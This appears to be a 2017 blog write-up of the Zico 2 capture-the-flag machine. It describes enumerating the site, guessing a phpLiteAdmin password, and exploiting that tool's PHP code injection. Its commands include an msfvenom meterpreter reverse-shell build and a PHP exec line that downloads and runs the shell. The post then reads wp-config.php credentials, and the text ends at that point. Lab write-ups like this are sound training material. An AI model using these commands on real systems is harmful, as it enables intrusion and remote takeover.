Thursday, 26 October 2017

Zico 2 challenge

Hello all,

Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?

Let's try to verify it.

The first of all, we should scan our target

I had to scan only 100 top ports, because scanning all ports consume a lot of time.

As always let's begin pentest from web application.

OK, let's enumerate it using dirb.

/dbadmin/ looks very interesting... Look at it deeper.

Let's click on the test_db.php

Hmmm, password... We don't know any password. But, we can see phpLiteAdmin v1.9.3, as far as I know, this version is vulnerable to PHP Code Injection.

Excellent, let's try also guess the password to admin panel.
Yes! admin is a valid password.

Great! Now, we can use our exploit.
We have created new database named hack.php.
The database hack.php contains only one table, with one record. The record is as follow <?php phpinfo(); ?>, and now let's execute it.

Great! We did PoC. Now, let's edit record from PoC to reverse shell.
I was trying upload and execute PHP reverse shell, but without success. S, maybe let's try play with ELF file.
We have to upload php file first and the file will be responsible for wget ELF file into server, then we will be able to execute the ELF file.

Generated payload
msfvenom -a x86 -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=53 -f elf -o shell
 Record in table
<?php exec("cd /tmp; wget; chmod a+x shell; ./shell"); ?>

So, now we have to execute Metasploit meterpreter

Excellent, we have got limited shell.
In /home/zico/wordpress directory I have found wp-config.php file, which contains db password for zico user. Let's try use it to change permission from www-data user to zico user.